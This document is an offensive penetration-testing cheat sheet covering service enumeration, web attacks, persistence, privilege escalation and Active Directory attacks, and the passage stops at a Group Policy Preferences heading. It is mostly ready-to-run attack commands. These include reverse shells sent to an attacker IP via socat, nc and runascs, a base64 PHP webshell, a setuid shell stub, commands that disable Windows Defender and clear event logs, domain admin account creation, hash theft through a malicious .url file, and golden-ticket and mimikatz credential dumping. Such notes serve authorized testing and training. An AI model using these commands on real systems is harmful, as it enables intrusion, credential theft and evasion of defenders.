Protocols
Most common services and their ports (all TCP unless stated otherwise):
| | |
| --------------------- | ---------------------------- |
| Port(s) | Service |
| 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP (mail) |
| 587 | secure SMTP |
| 53 (UDP) | DNS |
| 67 (UDP) and 68 (UDP) | DHCP |
| 69 (UDP) | TFTP |
| 80 | HTTP |
| 443 | HTTPS |
| 110 | POP3 (mail) |
| 111 | ONC RPC |
| 143 | IMAP (mail) |
| 161 (UDP) | SNMP |
| 139 and 445 | SMB |
| 1433 | MSSQL |
| 1978 | WiFi Mouse |
| 2049 | NFS |
| 3306 | MySQL |
| 3389 | Windows Remote Desktop (RDP) |
| 5900 | VNC |
| 5985 | WinRM HTTP |
| 5986 | WinRM HTTPS |
Most common #Active-Directory (AD) services and their ports:
| | |
| ----------------- | ------------------------ |
| Port(s) | Service |
| 53 | #DNS |
| 88 | #Kerberos Authentication |
| 135 | WMI RPC |
| 138, 139, and 445 | #SMB |
| 389 | #LDAP |
| 636 | #LDAPS |
| 5355 | #LLMNR |
| 8530 and 8531 | #WSUS |
Indicators of Domain Controller: ports 53, 88, 389 (LDAP), 636 (LDAPS)
β %SYSTEMROOT%\NTDS\NTDS.dit has all information and user password hashes
ARP Scan
arp
arp-scan -l [range]
netdiscover -r [range]
Service Scan
autorecon [targets] -v
nmap -pβ - -T4 -sC -sV -vv [targets]
FTP
ftp
wget -m ftp://[username]:[password]@[host] β download all files
ftp [host] OR ftp [username]@[host]
Run help for a more comprehensive list of commands.
β ls
β binary β transfer binary file
β ascii β transfer text file
β put [file] β upload
β get [file] β download
β mget * β get all files
β close
SSH
ssh #hydra #portforward
ssh -L [port on my machine I will use]:localhost:[port on server I want] user@ip
ssh [domain]\\[username]@[host] -p [port]
hydra -l [username] -P [wordlist] -s [port] ssh://[host]
SMTP
nmap #smtp #sendmail #swaks
nmap -p25, --script smtp-open-relay [host]
ismtp -h [host]:25 -e [wordlist] -l 3
smtp-user-enum -M [mode] -U [wordlist] -t [host]
β modes: VRFY, EXPN, RCPT
β example wordlist: /usr/share/metasploit-framework/data/wordlists/unix_users.txt
sendemail -s [host] -xu [username] -xp [password] -f [from] -t [to] -u [subject] -m [message] -a [attachment]
swaks --server [host] -au [username] -ap [password] -f [from] -t [to] --h-Subject [subject] --body [message] --attach @[attachment] -n
SNMP
snmp #hydra #snmpwalk
hydra -P [wordlist] -v [host] snmp
snmp-check -c [community] [ip]
snmpwalk -c [community] -v [version] [host] NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -c [community] -v [version β 1 or 2c] β entire MIB tree
snmpwalk -c [community] -v [version] [host] [identifier] β specific MIB parameter
MIB Identifiers
β System Processes: 1.3.6.1.2.1.25.1.6.0
β Running Programs: 1.3.6.1.2.1.25.4.2.1.2
β Processes Paths: 1.3.6.1.2.1.25.4.2.1.4
β Storage Units: 1.3.6.1.2.1.25.2.3.1.4
β Software Names: 1.3.6.1.2.1.25.6.3.1.2
β User Accounts: 1.3.6.1.4.1.77.1.2.25
β TCP Local Ports: 1.3.6.1.2.1.6.13.1.3
SMB
nbtscan #enum4linux #cme #crackmapexec #smbmap
nbtscan -r [range]
enum4linux -v -a [host]
crackmapexec smb [host] -u [username] -p [password] --rid-brute
see SMB Relay
SMBMap
β smbmap -H [host]
β -r β recursive
β --depth [depth] β traverse directory to specific depth (default 5)
β -u [username] -p [password]
β -x [command] β execute command
β -s [share] β enumerate share
β -d [domain] β enumerate domain
β --download [file]
β --upload [file]
OR
SMBClient #smbclient
smbclient -N -L //[host]
β smbclient //[host]/[share]
β -L [host] β list shares
β -I [ip]
β -D [directory]
β -U [domain]/[username]%[password]
β -N β donβt use password
β -c [command]
β download interesting files with
β smbclient //[host]/[share] (optional: -U [username])
β get [filename]
β put [filename]
β exit
OR recursively download all with
β prompt off
β recurse on
β mget *
OR
SMBGet #smbget
β smbget -R smb://[host]/[disk] β download all files
Bruteforce: crackmapexec smb [host] -u [user/users/file] -p [password/passwords/file] --continue-on-success
β [-] β invalid credentials
β [+] β valid credentials
β (Pwn3d!) β user is local admin
Windows
windows #shares
Shares
β SYSVOL β AD stuff (GPOs, logon scripts) C:\Windows\SYSVOL on DC
β C β C:\
β IPC β enumeration (admin scripts, event logs, etc)
dir \\[domain or ip]\[share] /user:[username] [password]
Note: domain β kerberos auth vs ip β NTLM auth
net use [drive letter]: \\[domain]\[share] /user:[username] [password] /persistent:yes
LDAP
ldap #ldapsearch
nmap --script=ldap* [host]
ldapdomaindump ldap://[host] -u '[domain]\[user]' -p [password] -o [dir]
ldapsearch -x -H ldap://[host] -b base namingcontexts
ldapsearch -x -H ldap://[host] -D '[domain]\[user]' -w [password] -b "DC=[subdomain],DC=[TLD]"
Kerberos
kerberos #kerbrute
kerbrute userenum --dc [DC] -d [domain] [userlist]
kerbrute passwordspray --dc [DC] -d [domain] [userlist] [password]
kerbrute bruteuser --dc [DC] -d [domain] [passlist] [user]
kerbrute bruteforce --dc [DC] -d [domain] [credslist]
β credslist contains [user]:[pass] on each line
RPC
rpcclient #rpc
rpcclient -N -U "" [host]
rpcclient -U [domain]/[user]%[password] [host]
β -N β no password
β --pw-nt-hash β supplied password is an nt hash
SQL
sql #mysql #impacket
MySQL: mysql -h [host] -P [port] -u [username] -p'[password]'
PostgreSQL: PGPASSWORD=[password] psql -h [host] -p [port] -U [username]
MSSQL
impacket-mssqlclient [domain]/[username]:[password]@[host] -port [port] -windows-auth
Interesting Functions
use master;
EXEC sp_helprotect 'xp_cmdshell';
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
Command Execution
SELECT value FROM sys.configurations WHERE name \= 'xp_cmdshell';
EXEC sp_configure 'show advanced options', '1';
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell [command];
Impersonate
SELECT * FROM sys.server_permissions WHERE permission_name \= 'IMPERSONATE';
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
EXECUTE AS login \= '[user]'; [query];
EXECUTE AS login \= '[user]'; EXEC xp_cmdshell '[command]';
Over Link
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
SELECT * FROM OPENQUERY("[target (srvname)]", '[query]');
SELECT * FROM OPENQUERY("[target]", 'SELECT @@SERVERNAME; exec xp_cmdshell ''[command]''');
Note: When using xp_cmdshell with OpenQuery, prepend a dummy query before it or else it wonβt work.
NFS
rpcinfo -p [host]
showmount -e [host]
mount [host]:[share] /mnt/[dir]
unmount /mnt/[dir]
WinRM
crackmapexec winrm [hosts] -u [username] -p [password]
evil-winrm -i [host] -u [user] -p [password]
evil-winrm -i [host] -u [user] -H [hash]
KRB5CCNAME=[ticket].ccache
evil-winrm -i [host] -r [domain] -u [user]
RDP
xfreerdp /u:[domain]\\[username] /p:[password] /v:[host] +clipboard /drive:[Windows share name],[kali folder]
xfreerdp /u:[domain]\\[username] /pth:[hash] /v:[host] +clipboard /drive:[Windows share name],[kali folder]
rdesktop -d [domain] -u [username] -p [password] [host]
hydra -l [username] -P [wordlist] -s [port] rdp://[host]
VNC
vncviewer [host]:[port] -passwd [password file]
hydra -s [port] -P [wordlist] -t 4 [host] vnc
Web Pen Testing
Payloads: PayloadsAllTheThings
Site Recon
Subdomains
theharvester -d [domain] -b [search engine]
amass enum -passive -src -d [domain]
amass enum -active -d [domain]
cat [file with domains] | httprobe
GoBuster
gobuster dns -d [domain] -w [wordlist] -t [num threads]
gobuster dir -u [target URL] -x [file extensions] -w [wordlist]
gobuster dir -u [target URL] -x [file extensions] -w [wordlist] -U [auth username] -P [auth password] -s [invalid status codes] -t [num threads]
β -k β donβt check ssl cert
ffuf
Directories: ffuf -w [wordlist] -u http://TARGET/FUZZ
Files: ffuf -w [wordlist] -u http://TARGET/FUZZ -e .aspx,.html,.php,.txt,.pdf -recursion
Subdomains: ffuf -w [wordlist] -u http://TARGET -H "Host: FUZZ.[domain]"
POST Data: ffuf -w [wordlist] -X POST -d "[username=admin\\&password=FUZZ]" -u http://TARGET
From File: ffuf -request [req.txt] -request-proto http -w [wordlist]
Creds: ffuf -request [req.txt] -request-proto http -mode [pitchfork/clusterbomb] -w [usernames.txt]:[HFUZZ] -w [passwords.txt]:[WFUZZ]
βGoodβ (Match)
β -mc β status code
β -ms β response size
β -mw β number of words
β -ml β number of lines
β -mr β regex pattern
βBadβ (Filter)
β -fc β status code
β -fs β response size
β -fw β number of words
β -fl β number of lines
β -fr β regex pattern
BurpSuite
BurpSuite Tabs
β Target β site map and spidering
β Proxy β intercept traffic
β Intruder β bruteforce attacks (think automated repeater)
β Repeater β send same request multiple times with different parameters
β Sequencer β analyse quality of randomness in session tokens
β Decoder β encode/decode text as hex, UTF, etc.
β Extender β add plugins
Intruder Attack Types
Single Payload Set
β Sniper: each payload goes to each payload position, in turn
β Battering Ram: same payload in all positions
Multiple Payload Sets
β Pitchfork: same payload position from multiple sets at a time (credential stuffing)
β Cluster Bomb: all payload combinations
Scoping Target
β right-click β Add to scope
β click filter bar on top β under Filter by request type, check Show only in-scope items
SQLmap
β sqlmap -u [base URL] --crawl=1 (check all pages for injectability)
β sqlmap -u [website URL] --current-user (gets current user)
β sqlmap -u [website URL] --dbs (gets databases)
β sqlmap -u [website URL] --current-database (gets current database)
β sqlmap -u [website URL] --dump --threads=[number] (gets all data from database)
β sqlmap -u [website URL] -D [database] --tables (gets tables)
β sqlmap -u [website URL] -D [database] -T [table] --columns (gets columns)
β sqlmap -u [website URL] -D [database] -T [table] -C [columns β can be multiple separated by ,] --dump
β sqlmap -u [website URL] --os-shell (attempts to get shell on target)
Local File Inclusion (LFI)
Directories to try
/etc/passwd
/var/log/apache2/access.log
C:\Windows\System32\drivers\etc\hosts
PHP wrappers
php://filter/resource=[file].php β display contents of PHP file
php://filter/convert.base64-encode/resource=[file].php
data://text/plain,\<?php[code]?> β run PHP code
data://text/plain;base64,[base64] β run base 64 encoded PHP code
data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==\&cmd=ls
WordPress
wpscan --url http://host -e vp,vt --detection-mode aggressive -v --api-token [token]
get token from https://wpscan.com/profile
Git
git-dumper http://url [output dir]
git status
git log
git show [commit hash]
git reset --hard [commit hash]
Linux/Kali
I will think of a better title for this section, I swear.
socat file:`tty`,raw,echo=0 tcp-listen:[port]
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[ip]:[port]
socat.exe exec:'cmd.exe',pipes TCP4:[ip]:[port]
Serving Files
HTTP: python3 -m http.server [port] --directory [directory]
SMB: impacket-smbserver [share] [directory] -port [port] -username [username] -password [password] -smb2support
FTP: python3 -m pyftpdlib -d [directory] -p [port] -u [username] -P [password]
β add -w for write permission
Beautify Shell
β python -c 'import pty; pty.spawn("/bin/bash")' OR script -qc /bin/bash /dev/null OR perl -e 'exec "/bin/sh";'
β ^Z (Ctrl+Z)
β stty -a
β remember rows and columns
β stty raw -echo
β fg
β fg (yes, you have to type it twice β this is not a typo)
β export term=xterm
β stty rows [rows] columns [columns]
Persistence
Create New Service
edit /etc/systemd/system/[service].service
| [Unit]\ |
systemctl daemon reload
systemctl enable [service]
Create New Cron Job
crontab -e
[minute] [hour] [day of month] [month] [day of week] [command]
Windows
Lateral Movement
Remote Enumeration
net session \\[host]
reg query \\[host]\[key] ...
net view \\[host]
dir \\[host]\[share]
net use * \\[host]\[share] /user:[domain]\[username] [password]
tasklist /s [host] ...
Movement
psexec \\[host] -u [username] -p [password] -i cmd
winrs -u:[username] -p:[password] -r:[host] cmd
Switch Users
runas /user:[domain]\[username] cmd
β /netonly to keep same user access on local machine (only login for network connections)
β /savecred to get creds from or save creds to Windows Credential Manager
runascs [username] [password] cmd
β -d [domain]
β -r [host]:[port] β reverse shell
β -b β bypass UAC
Create New Process (WMI)
wmic /node:[ip] process call create [executable]
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -CimSession (New-CimSession -ComputerName "[ip]") -Arguments @{CommandLine="[executable]"}
Create New Service
sc \\[host] create [service] binPath= "[executable]" start= auto displayname= "[name]"
sc \\[host] description [service] "[description]"
sc \\[host] [start/stop/delete] [service]
Modify Existing Service
sc \\[host] qc vss β β service runs as LocalSystem
sc \\[host] query vss β β service is currently not running
sc \\[host] config vss binpath= "[executable]"
sc \\[host] [start/stop] vss
Create Scheduled Task
schtasks /s [host] /ru [user] /create /f /tn [name] /tr [command] /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s [host] /run /tn [name]
Persistence
User Level
Note: To find more autorun options, check out Autoruns from SysInternals. This includes startup directories and registry keys.
Startup Directories
β %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup β executed when current user logs in
β %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup β executed when any user logs in
Registry Run Key
Runs When Current User Logs In
upload exe file to somewhere in %USERPROFILE%\AppData\Roaming
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [name] /t REG_SZ /f /d "[path to exe]"
Runs When Any User Logs In
upload exe file to somewhere in C:\ProgramData
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v [name] /t REG_SZ /f /d "[path to exe]"
Scheduled Task
upload exe file to somewhere in %USERPROFILE%\AppData\Roaming
schtasks /create /f /tn [name] /tr [path to exe] /sc ONLOGON
schtasks /create /f /tn [name] /tr [path to exe] /sc DAILY /st [hh:mm]
β check with schtasks /query /tn [name] /fo list /v
β run manually with schtasks /run /tn [name]
System Level
Startup Service
upload file to somewhere in %SystemRoot%\System32
Note: either upload a service executable or use cmd /c start /b [executable] as your binpath
sc create [service] binPath= "[executable]" start= auto displayname= "[name]"
sc description [service] "[description]"
sc [start/stop/delete] [service]
Scheduled Task
upload exe file to somewhere in %SystemRoot%\System32
schtasks /create /f /tn [name] /ru system /tr [path to exe] /sc ONSTART
schtasks /create /f /tn [name] /ru system /tr [path to exe] /sc DAILY /st [hh:mm]
β check with schtasks /query /tn [name] /fo list /v
β run manually with schtasks /run /tn [name]
WMI Event
upload exe file to somewhere in %SystemRoot%\System32
wmic /NAMESPACE:"\\root\subscription" PATH EventFilter CREATE Name="[name]", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="[name]", ExecutablePath="[executable]",CommandLineTemplate="[executable]"
wmic /NAMESPACE:"\\root\subscription" PATH FilterToConsumerBinding CREATE Filter="EventFilter.Name=\"[name]\"", Consumer="CommandLineEventConsumer.Name=\"[name]\""
Recursive File Listing
dir /s /a \\[host]\[path] > [logfile]
forfiles /s /c "cmd /c echo @path" /p [path] > [logfile]
makecab [logfile] [compressed].zip
extract [compressed].zip [logfile]
Enable Command Prompt
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
OR
netsh advfirewall set allprofiles state off
sc start TermService
User Creation
Local
net user [username] [password] /add
net localgroup Administrators [username] /add
net localgroup "Remote Management Users" [username] /add
net localgroup "Remote Desktop Users" [username] /add
Domain
net user [username] [password] /add /domain
net group "Domain Admins" [username] /add /domain
Insecure Guest Authentication
Enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /t REG_DWORD /d 1 /f
shutdown /r /f /t 0
Disable
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /f
shutdown /r /f /t 0
Privilege Escalation
https://gitlab.com/exploit-database/exploitdb-bin-sploits
Windows
Checklist
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
1. access tokens
2. Administrators group β fodhelper UAC bypass
3. PowerShell history
4. service permissions
5. DLL hijacking
6. recent folders/files
7. interesting folders/files: C:\, C:\Users
8. passwords in registry
9. stored WiFi passwords
10. kernel version
Check AppLocker/Antivirus
(Get-ApplockerPolicy -Effective).RuleCollections
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ErrorAction Stop
Get-MpComputerStatus
sc query windefend
Disable Windows Defender
sc config WinDefend start= disabled
Set-MpPreference -DisableRealtimeMonitoring $true
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Clear Event Log
Clear-EventLog -LogName Application, Security
Access Tokens
SeImpersonatePrivilege β Potato Attacks
SweetPotato.exe -p nc.exe -a "-nv [ip] [port] -e cmd" &
GodPotato.exe -cmd "nc -nv [ip] [port] -e cmd" &
GodPotato.exe -cmd "net user [username] [password] /add"
GodPotato.exe -cmd "net localgroup Administrators [username] /add"
runascs [username] [password] cmd -b -r [attacker ip]:[port]
SeRestorePrivilege β SeRestoreAbuse
PowerShell History
Get-History
(Get-PSReadlineOption).HistorySavePath
β type [path]
Service Permissions
Recommended: use a script like PrivescCheck.ps1
sc qc [service]
sc sdshow [service] β list service permissions
icacls [path] β list folder/file permissions (eg. unquoted service path)
sc config [service] binpath= "[executable]" β reconfigure service
β [executable] can either be a service executable or cmd /c start /b [executable]
sc [start/stop] [service]
DLL Hijacking
msfvenom [options] -f dll -o [file].dll
Recent Folders/Files
dir %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
Interesting Folders/Files
Get-ChildItem -Path C:\Users -Include .txt,.ini,.pdf,.kdbx,*.exe -Recurse -ErrorAction SilentlyContinue
Passwords in Registry
reg query HKLM /f password /t REG_SZ /s
Stored WiFi Passwords
netsh wlan show profiles
netsh wlan export profile folder=. key=clear
Kernel Exploits
https://github.com/SecWiki/windows-kernel-exploits
Guides
β HackTricks
β Absoloom's Guide
Scripts
Executables
β winPEAS
β Seatbelt (compile)
β SharpUp (compile)
β Watson (compile)
PowerShell
β PrivescCheck
β Invoke-PrivescCheck -Extended
β Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)" -Format TXT,CSV,HTML,XML
β PowerUp (deprecated)
β Invoke-AllChecks
β Jaws
β Sherlock (deprecated)
Other
β windows-exploit-suggester β get kernel exploits from sysinfo
β wes --update
β wes systeminfo.txt -c -e -i "Elevation"
β Meterpreter run post/multi/recon/local_exploit_suggester
β Meterpreter getsystem
Linux
Checklist
https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
1. SUID
2. sudo
3. processes running as root
4. internal services β port redirection
5. cron jobs
6. interesting folders/files: /, /opt, /home
7. kernel version
*check GTFObins
SUID
find / β -perm -u=s -user root 2>/dev/null
find / -perm -g=s -group root 2>/dev/null
getcap -r / 2>/dev/null
Sudo
sudo -l
Processes
ps fauxww
ps -ewwo pid,user,cmd --forest
Services
netstat/ss -antup
netstat/ss -plunt
Cron Jobs
cat /etc/crontab
ls /var/spool/cron
ls /etc/cron.*
Guides
β HackTricks
β g0tmi1k Blog
Scripts
β linPEAS
β LinEnum
β linuxprivchecker
β Meterpreter run post/multi/recon/local_exploit_suggester
int main {
setuid(0);
setgid(0);
system("/bin/bash");
}
cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p
Active Directory (AD)
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
Sync clock: timedatectl set-ntp 0 && ntpdate -u [domain]
LLMNR/NBT-NS Poisoning
β responder -I [interface] -dwP (optional -v)
β Remember you can get interface with ip a
β hashcat -m 5600 [file containing obtained hash] [wordlist]
SMB Relay
Requirements: SMB signing disabled and relayed credentials are admin on the target machine
Note: You canβt relay back to the same machine.
β discover hosts with SMB signing disabled:
β Nessus scan will tell you
OR
β nmap --script smb2-security-mode -p 445 [network]
β Check for enabled and not required
OR
β crackmapexec smb [network]
β Check for signing:False
β Add hosts to targets file (separate lines)
OR
β crackmapexec smb [network] --gen-relay-list [targets file]
β edit /etc/responder/Responder.conf
β Change SMB \= and HTTP \= from On to Off
β responder -I [interface] -dwP (optional -v)
AND
β impacket-ntlmrelayx -tf [targets file] -smb2support
β -i β interactive smb shell
β Wait for connection β note βstarted interactiveβ port
β nc -nv 127.0.0.1 [port]
β -e [malicious].exe β execute file
β Can be msfvenom payload for example
β -c "[command]" β execute command
β -l [directory] β store loot in directory (see IPv6 attacks) β useful if credentials are non-admin
IPv6 Attack
https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
β Install MITM6 β download from GitHub, cd to directory, and pip3 install .
β If it fails, try normal pip
β mitm6 -d [domain]
AND
β impacket-ntlmrelayx -6 -t ldaps://[DC IP] -wh bogus.[domain] -l [directory]
β cd to directory and firefox [file] to see info
β look for username and password for newly created user in ntlmrelayx prompt
URL File Attack
Note: must have access to a writable SMB share
β upload file that starts with @ or ~ symbol and ends in .url: @test.url
β (@ or ~) ensures it shows up at top when user opens share
β File contents:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\[attacker ip]\%USERNAME%.icon
IconIndex=1
β responder -I [interface] -v
https://github.com/Greenwolf/ntlm_theft
ntlm_theft -s [attacker ip] -f [name] -g [all/url]
hashcat -m 5600 [hashes] [wordlist]
BloodHound
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
Collection
β SharpHound.exe -c [method] -d [domain] --exclude-dcs --zipfilename sharp.zip
β bloodhound-python -c [method] -d [domain] -u [username] -p [password] --hashes [hash] -ns [DC] --zip -v
β Invoke-Bloodhound (from SharpHound.ps1)
β powershell -ep bypass
β . .\SharpHound.ps1
β Invoke-Bloodhound -CollectionMethod [method] -Domain [domain] -ExcludeDCs -ZipFileName [outfile]
β on first run: CollectionMethod β All
β on subsequent runs (to get updated session info): CollectionMethod β Session
β in BloodHound, click Database Info β Clear Sessions
Analysis
β neo4j console
β bloodhound --no-sandbox
MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
Kerberos
Kerberos Authentication
AS_REP β provides TGT β β ticket to get other service tickets
β you can only have one TGT
TGS_REP β provides TGS β ticket to get access to specific service
Ticket Conversion
Converting tickets between impacket and mimikatz/Rubeus format
kirbi2ccache [kirbi file] [ccache file]
ccache2kirbi [ccache file] [kirbi file]
impacket-ticketConverter [ccache/kirbi file] [kirbi/ccache file]
β kirbi β mimikatz
β ccache β impacket
Request New Initial TGT
Note: requires userβs password or hash
Rubeus
rubeus asktgt /domain: /user: /password:
β /enctype:[rc4|aes128|aes256|3des]
β use aes256 (default) for enctype
β if you donβt have password but have hash, replace /password: with /rc4: /aes128: /aes256: or /des:
Mimikatz
tgt::ask /domain: /user: /password:
Impacket (Remote)
impacket-getTGT [domain]/[user]:[password]
β -dc-ip [DC]
β -hashes [hash]
export KRB5CCNAME=[ticket].ccache
Request Delegated TGT
canβt change passwords with delegated TGTs but can request TGSes
Notes:
β domain controllers by default can provide delegated TGTs
β normal for some processes (like explorer) but weird for others (like notepad). For processes that itβs weird, if you donβt want to get flagged by Windows Defender be sure to use /host
β useful for using impacket scripts without knowing password β convert ticket to ccache
Rubeus
rubeus tgtdeleg
β /target:[SPN]
Mimikatz
tgt::deleg β contacts domain controller by default
β /host:[FQDN] β have another host delegate for you (stealthy)
β find with Get-AdComputer -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
Request TGS
Rubeus
rubeus asktgs /service:[SPN]/[FQDN]
β To impersonate another user (same as request TGT):
β /enctype:
β /user:[username]
β /password:[password]
β if you donβt have password but have hash, replace /password: with /rc4: /aes128: /aes256: or /des:
Mimikatz
kerberos::ask /target:[SPN]/[FQDN]
β Optional /export to export
Impacket (Remote)
impacket-getST [domain]/[user]:[password] -spn [service]/[host]
β -dc-ip [DC]
β -hashes [hash]
β -impersonate [user]
Note: Automatically modifies impersonate TGS so it can be used with other impacket tools.
Modify Existing TGS for Another Service
Rubeus
rubeus asktgs /altservice:[SPN] /ticket:[ticket]
β /ptt will automatically load onto current logon session
Impacket (Remote)
See note above. Realistically, this is only used in constrained delegation attacks so look there.
Harvest Tickets
Rubeus
rubeus harvest /interval:30 β list current session TGT
β interval: time between harvests (seconds)
rubeus triage β list current session all tickets with logon id and expiration time
rubeus klist β list current session tickets with detailed info
rubeus dump β extract all tickets (basically /export for mimikatz)
β /user:[user] for a specific user
β /service:[service] for a specific service
β /luid:[logon id] for specific session, if we have access to all sessions (admin)
β /nowrap β easier copy-and-paste
Mimikatz
kerberos::tgt β list current session TGT
kerberos::list β list current session all tickets
sekurlsa::tickets β list all tickets for all sessions but injects into LSASS memory so donβt do it if thereβs a monitoring service
β add /export to any of these to export but first base64 /out:true and base64 /in:true to export base64 encoded (less likely to be detected)
Harvest Keys
Mimikatz
sekurlsa::ekeys
Purge Tickets
Rubeus
rubeus purge
Mimikatz
kerberos::purge
Pass-the-Key (PTK)/Overpass-the-Hash (OPTH)
pass-the-key or pass-the-hash to obtain a TGT
Rubeus
rubeus asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt
Mimikatz
sekurlsa::pth /user:[user] /domain:[domain] /rc4:[hash]
β /run:[cmd.exe OR powershell.exe]
Impacket (Remote)
impacket-getTGT [domain]/[user]:[password]
β -dc-ip [DC]
β -hashes [hash]
export KRB5CCNAME=[ticket].ccache
Pass-the-Ticket (PTT)
Note: can either pass the TGT or pass the TGS
β dump the ticket to be passed (see Harvest Tickets above)
β for Mimikatz, export tickets with sekurlsa::tickets /export
Rubeus
rubeus ptt /ticket:[ticket]
Mimikatz
kerberos::ptt [ticket]
β verify with klist β list cached tickets
Impacket
export KRB5CCNAME=[ticket].ccache
Golden/Silver Ticket
Golden Ticket: create forged TGT for domain admin using adminβs hash
Silver Ticket: create forged TGS for service using serviceβs hash β useful for impersonating users when logging into a service
β same effect as requesting a TGT or TGS, but without communicating with the domain controller
β you can create it for any user, even one that doesnβt exist
Mimikatz
Domain SID:
wmic useraccount get name,sid
Current Realm:
kerberos::golden /user: /domain: /sid: /krbtgt: /ptt
β sid β DC SID
β krbtgt β [NTLM hash]
β user and id can be whatever you want them to be
β /user:Administrator /id:500 for golden ticket
β service β specify SPN for silver ticket
Inter-Realm:
kerberos::golden /user: /domain: /sid: /krbtgt: /service:krbtgt /sids: /ptt
β sid β child DC SID
β krbtgt β [NTLM hash]
β sids β enterprise admin group SID
β user and id can be whatever you want them to be
β /user:Administrator /id:500 for golden ticket
Impacket
Domain SID:
impacket-getPac -targetUser Administrator [domain]/[user]:[password]
crackmapexec ldap [DC] -u [user] -p [password] -k --get-sid
Current Realm:
impacket-ticketer -domain [domain] -domain-sid [SID] -nthash [krbtgt hash] Administrator
β for another user: replace Administrator with -user-id [ID] [user]
β -spn [SPN] for silver ticket
export KRB5CCNAME=[ticket].ccache
Inter-Realm:
Manually
impacket-ticketer -domain [domain] -domain-sid [SID] -nthash [krbtgt hash] -spn krbtgt -extra-sid [enterprise admin group SID]
export KRB5CCNAME=[ticket].ccache
Automatically
impacket-raiseChild [domain]/[user]:[password]
β -w [ticket] β write out golden ticket
β -target-exec [host] β psexec to host after compromise
Skeleton Key
used to access any SMB share with the same password
β misc::skeleton
β default password is mimikatz
β see Interacting with SMB above
AS-REP Roasting
Obtaining Hash
Rubeus
rubeus asreproast /format:[hashcat/john] /outfile:hashes.txt
Impacket
impacket-GetNPUsers [domain]/[user]:[password]
β -dc-ip [DC]
β -hashes [hash]
β without creds (donβt provide [user]:[password]) β -usersfile [usernames]
β -request -format [hashcat/john] -outputfile hashes.txt
Cracking
hashcat -m 18200 hashes.txt [wordlist]
john hashes.txt --wordlist [wordlist]
Kerberoasting (TGS-REP Roasting)
Note: requires access to any user account on the domain
Obtaining Hash
Rubeus
rubeus kerberoast /outfile:hashes.txt
Impacket
impacket-GetUserSPNs [domain]/[user]:[password]
β -dc-ip [DC]
β -hashes [hash]
β -request-user [SPN]
β -request -outputfile hashes.txt
Cracking
hashcat -m 13100 hashes.txt [wordlist]
john hashes.txt --wordlist [wordlist]
Constrained Delegation
Check for Constrained Delegation
Get-Net[User/Computer] -TrustedToAuth | Select name,msds-allowedtodelegateto,useraccountcontrol
Get-Net[User/Computer] [name] | Select-Object -ExpandProperty msds-allowedtodelegateto
impacket-findDelegation [domain]/[user]:[password]
Exploit Constrained Delegation
impacket-getST -spn [service]/[host] -impersonate [user to impersonate] [domain]/[user]:[password]
export KRB5CCNAME=[ticket].ccache
You can also use Rubeus:
8. Request TGT for service
9. Request TGS on behalf of user (Rubeus s4u)
10. Modify existing TGS for another service (like cifs)
11. Load TGS
However, this is probably a waste of your time since impacket does this in one command.
WDigest Plaintext Logon Credentials
β reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 β force WDigest to store logon credentials in plaintext
β wait for user to log in
β sekurlsa::wdigest β check for plaintext passwords
Group Policy Preferences (GPP)
Note: patched in MS14-025
Locally
